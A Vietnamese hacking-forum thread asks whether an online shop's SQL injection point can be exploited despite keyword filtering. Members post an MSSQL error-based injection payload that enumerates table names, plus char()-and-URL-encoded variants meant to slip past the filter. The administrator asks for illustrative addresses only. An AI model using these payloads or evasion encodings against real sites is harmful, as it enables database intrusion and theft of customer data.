English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Thâm nhập qua lỗi SQL Injection này được không?  XML
  [Question]   Thâm nhập qua lỗi SQL Injection này được không? 31/10/2007 04:33:57 (+0700) | #1 | 94106
chatting2005
Member
[Minus]    0    [Plus]
Joined: 15/07/2006 11:21:48
Messages: 5
Offline
[Profile] [PM]
Đây là link trang lỗi
http://www.site.com/addCart.asp?v=1&pid=2148779'
Sau khi thêm đủ kiểu and, or và union nó đều về trang chủ, chịu thua không biết tiếp tục thế nào.
Vậy có thể thâm nhập trang trên thông qua lỗi injection này không?
Cám ơn mọi người đã đọc smilie
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 31/10/2007 07:00:55 (+0700) | #2 | 94153
[Avatar]
 gamma95
Researcher
Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline
[Profile] [PM] [ICQ]
nó filter keyword thôi
Cánh chym không mỏi
lol
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 31/10/2007 20:09:58 (+0700) | #3 | 94258
chatting2005
Member
[Minus]    0    [Plus]
Joined: 15/07/2006 11:21:48
Messages: 5
Offline
[Profile] [PM]
Mình thấy tấn công qua lỗi injection là nhờ vào các keyword, nó lọc các keyword thì tức là trang này mình không tấn công được phải không bạn smilie
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 31/10/2007 20:37:42 (+0700) | #4 | 94261
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

chatting2005 wrote:
Mình thấy tấn công qua lỗi injection là nhờ vào các keyword, nó lọc các keyword thì tức là trang này mình không tấn công được phải không bạn smilie  


Thử tìm hiểu xem "nó" lọc các keyword ở mức độ nào? (gợi ý: lọc keyword ở dạng ASCII bình thường hay lọc cả ở dạng encoded luôn?).

PS: Tôi tham gia chủ đề này với cái nhìn thuần túy kỹ thuật. Tôi không chấp nhận những exploit thật và dùng địa chỉ thật. Đặc biệt là các "shop" online. Bởi thế, tôi đề nghị sửa lại nội dung mang địa chỉ mang tính minh họa mà thôi.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 26/02/2008 08:53:36 (+0700) | #5 | 116653
kimsonha
Member
[Minus]    0    [Plus]
Joined: 28/05/2007 10:07:19
Messages: 46
Offline
[Profile] [PM] [Yahoo!]
Thử tìm hiểu xem "nó" lọc các keyword ở mức độ nào? (gợi ý: lọc keyword ở dạng ASCII bình thường hay lọc cả ở dạng encoded luôn?).  

Em chưa biết cách tìm hiểu cách "nó" lọc keyword như thế nào , nhưng theo gợi ý của bác conmale thì có hai cách smilie (chắc có nhiều nhưng bác chỉ chỉ hai cach thương áp dụng nhỉ) .
  • lọc keyword ở dạng ASCII

Nếu là lọc sang ASCII thì chắc ta phải convert sang ASCII phải không ạ ? Sau đó đưa lên ngay url để query sao ?
Ví dụ em có query :
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- 

thì em phải chuyển sang ASCII là :
char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45) 

Như vậy có đúng không ạ ?
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 27/02/2008 01:09:28 (+0700) | #6 | 116749
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

kimsonha wrote:
Thử tìm hiểu xem "nó" lọc các keyword ở mức độ nào? (gợi ý: lọc keyword ở dạng ASCII bình thường hay lọc cả ở dạng encoded luôn?).  

Em chưa biết cách tìm hiểu cách "nó" lọc keyword như thế nào , nhưng theo gợi ý của bác conmale thì có hai cách smilie (chắc có nhiều nhưng bác chỉ chỉ hai cach thương áp dụng nhỉ) .
  • lọc keyword ở dạng ASCII

Nếu là lọc sang ASCII thì chắc ta phải convert sang ASCII phải không ạ ? Sau đó đưa lên ngay url để query sao ?
Ví dụ em có query :
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- 

thì em phải chuyển sang ASCII là :
char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45) 

Như vậy có đúng không ạ ? 


Dòng trên là ASCII, dòng dưới là urlencoded (chớ không phải "chuyển sang ASCII").

Tùy bộ lọc ấy có lọc thuần túy ASCII hay lọc cả urlencoded format mà đi đến chỗ query có được hay không.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 28/02/2008 07:59:05 (+0700) | #7 | 117010
kimsonha
Member
[Minus]    0    [Plus]
Joined: 28/05/2007 10:07:19
Messages: 46
Offline
[Profile] [PM] [Yahoo!]
Em vẫn chưa hiểu được ý của bác conmale,
Dòng trên là ASCII, dòng dưới là urlencoded (chớ không phải "chuyển sang ASCII"). 

Có một số trang khi query table đầu tiên thành công, nhưng khi query table tiếp theo thì mình cần chuyển sang ASCII thì mới query được . Như vậy thì phải gọi là chuyển sang ASCII đúng không ạ ?
Theo như em nghĩ thì khi xử lí query thì nếu phát hiện thấy có từ and , or hay union thì sẽ loại bỏ truy vấn và đưa mình về trang chủ (cái này la đoán mò thôi, chứ em mới học lớp 11 à, kiến thức còn gà lắm) . Vậy nếu mình chuyển sang mã ASCII để query thì nó sẽ xử lí như sau:
  • kiếm tra xem trong query có các kí tự không cho phép hay không? Không => cho qua

  • sau đó nó gặp char() và nó chuyển các char() đó sang kí tự như ta vấn thấy

  • bây giờ nó xử lí truy vấn, và lúc này nó sẽ không kiểm tra các kí tự không cho phép nên ta sẽ lọt được qua khỏi bộ lọc đó

Không biết như vậy có đúng không ạ ?
Em vấn chưa hiểu cái này:
dòng dưới là urlencoded  

Bác làm ơn nói rõ hơn được không ?
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 28/02/2008 21:44:06 (+0700) | #8 | 117088
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Sao không tự tìm thử "urlencode" là cái gì?

Bồ thực thi cái query đó bằng phương tiện nào (xuyên qua SQL client, trình duyệt, netcat....)?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 29/02/2008 23:12:25 (+0700) | #9 | 117276
kimsonha
Member
[Minus]    0    [Plus]
Joined: 28/05/2007 10:07:19
Messages: 46
Offline
[Profile] [PM] [Yahoo!]
A em hiểu "urlencode" là gì rồi. em thực thi query qua trình duyệt nên gọi là urlencode đúng không ạ ?
Đây là lần đầu tiên em nghe thây hack SQL qua netcat, vậy ta có thể khai thác qua netcat như thế nào vậy bác ?
[Up] [Print Copy]
  [Question]   Re: Thâm nhập qua lỗi SQL Injection này được không? 01/03/2008 02:23:37 (+0700) | #10 | 117314
mR.Bi
Member
[Minus]    0    [Plus]
Joined: 22/03/2006 13:17:49
Messages: 812
Offline
[Profile] [PM] [WWW]
Code:
char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45)

Dòng này là urlencode, nhưng nghe nói urlencode dùng bảng mã ASCII (gồm số và chữ), các kí tự -_.!~*'(), và "+" , "%", khoảng trắng đc chuyển thành "+" thì phải.
Vậy nếu bạn có
Code:
char(97)%2bchar(110)%2bchar(100)%2bchar(NULL)%2bchar(49)%2bchar(61)%2bchar(99)%2bchar(111)%2bchar(110)%2bchar(118)%2bchar(101)%2bchar(114)%2bchar(116)%2bchar(40)%2bchar(105)%2bchar(110)%2bchar(116)%2bchar(44)%2bchar(40)%2bchar(115)%2bchar(101)%2bchar(108)%2bchar(101)%2bchar(99)%2bchar(116)%2bchar(NULL)%2bchar(116)%2bchar(111)%2bchar(112)%2bchar(NULL)%2bchar(49)%2bchar(NULL)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(95)%2bchar(110)%2bchar(97)%2bchar(109)%2bchar(101)%2bchar(NULL)%2bchar(102)%2bchar(114)%2bchar(111)%2bchar(109)%2bchar(NULL)%2bchar(105)%2bchar(110)%2bchar(102)%2bchar(111)%2bchar(114)%2bchar(109)%2bchar(97)%2bchar(116)%2bchar(105)%2bchar(111)%2bchar(110)%2bchar(95)%2bchar(115)%2bchar(99)%2bchar(104)%2bchar(101)%2bchar(109)%2bchar(97)%2bchar(46)%2bchar(116)%2bchar(97)%2bchar(98)%2bchar(108)%2bchar(101)%2bchar(115)%2bchar(41)%2bchar(41)%2bchar(45)%2bchar(45)

thì decode sẽ ra
Code:
char(97)+char(110)+char(100)+char(NULL)+char(49)+char(61)+char(99)+char(111)+char(110)+char(118)+char(101)+char(114)+char(116)+char(40)+char(105)+char(110)+char(116)+char(44)+char(40)+char(115)+char(101)+char(108)+char(101)+char(99)+char(116)+char(NULL)+char(116)+char(111)+char(112)+char(NULL)+char(49)+char(NULL)+char(116)+char(97)+char(98)+char(108)+char(101)+char(95)+char(110)+char(97)+char(109)+char(101)+char(NULL)+char(102)+char(114)+char(111)+char(109)+char(NULL)+char(105)+char(110)+char(102)+char(111)+char(114)+char(109)+char(97)+char(116)+char(105)+char(111)+char(110)+char(95)+char(115)+char(99)+char(104)+char(101)+char(109)+char(97)+char(46)+char(116)+char(97)+char(98)+char(108)+char(101)+char(115)+char(41)+char(41)+char(45)+char(45)


vẫn còn dấu cộngsmilie nên decode lần nữa, "+" thành khoảng trắng
Code:
char(97) char(110) char(100) char(NULL) char(49) char(61) char(99) char(111) char(110) char(118) char(101) char(114) char(116) char(40) char(105) char(110) char(116) char(44) char(40) char(115) char(101) char(108) char(101) char(99) char(116) char(NULL) char(116) char(111) char(112) char(NULL) char(49) char(NULL) char(116) char(97) char(98) char(108) char(101) char(95) char(110) char(97) char(109) char(101) char(NULL) char(102) char(114) char(111) char(109) char(NULL) char(105) char(110) char(102) char(111) char(114) char(109) char(97) char(116) char(105) char(111) char(110) char(95) char(115) char(99) char(104) char(101) char(109) char(97) char(46) char(116) char(97) char(98) char(108) char(101) char(115) char(41) char(41) char(45) char(45)



Mò, nên %đúng là rất ít smilie
All of my life I have lived by a code and the code is simple: "honour your parent, love your woman and defend your children"
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|